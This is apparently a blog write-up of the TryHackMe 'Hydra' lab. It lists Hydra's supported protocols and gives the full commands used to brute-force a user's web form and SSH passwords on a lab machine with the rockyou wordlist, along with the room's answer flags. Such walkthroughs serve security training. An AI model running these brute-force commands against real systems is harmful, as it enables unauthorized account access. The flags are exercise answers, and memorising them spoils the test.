Home Hydra
Post
Cancel

Hydra

Learn about and use Hydra, a fast network logon cracker, to bruteforce and obtain a website’s credentials.

https://tryhackme.com/room/hydra

0xskar


Task 1 - Hydra Introduction

Hydra has the ability to bruteforce the following protocols: Asterisk, AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-POST, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTPS-POST, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, RTSP, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.

For more information on the options of each protocol in Hydra, read the official Kali Hydra tool page: https://en.kali.tools/?p=220


Task 2 - Using Hydra

Answer the questions below

Use Hydra to bruteforce molly’s web password. What is flag 1?

  • hydra -t 16 -l molly -P /usr/share/seclists/Passwords/rockyou.txt 10.10.84.248 http-post-form "/login:username=^USER^&password=^PASS^:F=incorrect"

  • THM{2673a7dd116de68e85c48ec0b1f2612e}

Use Hydra to bruteforce molly’s SSH password. What is flag 2?

  • hydra -t 16 -l molly -P /usr/share/seclists/Passwords/rockyou.txt 10.10.84.248 ssh

  • THM{c8eeb0468febbadea859baeb33b2541b}


This post is licensed under CC BY 4.0 by the author.